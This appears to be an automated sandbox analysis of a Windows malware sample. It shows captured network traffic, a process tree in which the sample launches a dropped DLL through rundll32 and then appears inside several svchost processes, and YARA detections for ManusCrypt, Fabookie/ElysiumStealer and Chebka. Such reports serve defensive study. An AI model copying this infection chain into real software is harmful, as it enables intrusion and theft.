                                                          2022-09-11 08:17:47 UTC635OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 37 31 33 34 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 55 53 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 34 34 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 37 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.17134</osVer><proc>x64</proc><lcid>en-US</lcid><geoId>244</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware7,1</deviceName></agent></connect>
                                                          2022-09-11 08:17:47 UTC636OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 31 34 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 64 35 62 37 33 35 61 35 33 33 62 32 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 47 62 78 49 64 63 6d 72 7a 37 53 70 4d 4b 32 31 51 41 42 43 30 78 4c 73 62 61 79 36 75 6a 53 34 43 31 64 48 2f 4d 73 53 2b 70 6d 35 55 30 45 35 58 7a 65 4d 53 6f 43 30 2b 50 64 64 76 70 39 31 49 37 6c 50 35 68 71 6c 64 51 4e 69 75 46 54 7a 6d 46 58 6e 42 6a 64 62 5a 53 64 4c 56 55 34 72 41 44 58 6e 30 76 30 55 4d 57 79 77 2b 48 53 71 55 72 37 6d 58 4b 6a 66 51 76 69 6e 46 62 4e 59 78 69 76 4e 42 4b 6b
                                                          Data Ascii: ATH 2 CON\DEVICE 1014Context: 767d5b735a533b2f<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXGbxIdcmrz7SpMK21QABC0xLsbay6ujS4C1dH/MsS+pm5U0E5XzeMSoC0+Pddvp91I7lP5hqldQNiuFTzmFXnBjdbZSdLVU4rADXn0v0UMWyw+HSqUr7mXKjfQvinFbNYxivNBKk
                                                          2022-09-11 08:17:47 UTC637OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 32 39 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 36 37 64 35 62 37 33 35 61 35 33 33 62 32 66 0d 0a 0d 0a
                                                          Data Ascii: BND 3 CON\QOS 29Context: 767d5b735a533b2f
                                                          2022-09-11 08:17:47 UTC637INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2022-09-11 08:17:47 UTC637INData Raw: 4d 53 2d 43 56 3a 20 41 30 54 78 6d 47 56 45 59 30 4f 58 57 6c 6a 62 61 4b 41 63 39 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: A0TxmGVEY0OXWljbaKAc9A.0Payload parsing failed.


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:10:16:20
                                                          Start date:11/09/2022
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                          Imagebase:0x400000
                                                          File size:73728 bytes
                                                          MD5 hash:338057BA65F786F4238BE340D64DAF08
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:1
                                                          Start time:10:16:21
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:2
                                                          Start time:10:16:22
                                                          Start date:11/09/2022
                                                          Path:C:\Users\user\Desktop\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\file.exe" -h
                                                          Imagebase:0x400000
                                                          File size:73728 bytes
                                                          MD5 hash:338057BA65F786F4238BE340D64DAF08
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low

                                                          Target ID:3
                                                          Start time:10:16:22
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:10:16:27
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                          Imagebase:0x7ff76eb30000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:5
                                                          Start time:10:16:29
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                          Imagebase:0x1e0000
                                                          File size:61952 bytes
                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Fabookie, Description: Detects Fabookie / ElysiumStealer, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:high

                                                          Target ID:7
                                                          Start time:10:16:30
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:high

                                                          Target ID:9
                                                          Start time:10:16:31
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\svchost.exe -k WspService
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.317215501.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.798463056.00000244FC2B3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.813755349.00000244FF240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.309035814.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.807536432.00000244FE300000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000009.00000003.424592109.00000244FE303000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                                                          Target ID:11
                                                          Start time:10:16:32
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ffc30280000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:17
                                                          Start time:10:16:41
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:18
                                                          Start time:10:16:43
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:19
                                                          Start time:10:16:45
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:20
                                                          Start time:10:16:49
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:22
                                                          Start time:10:16:51
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
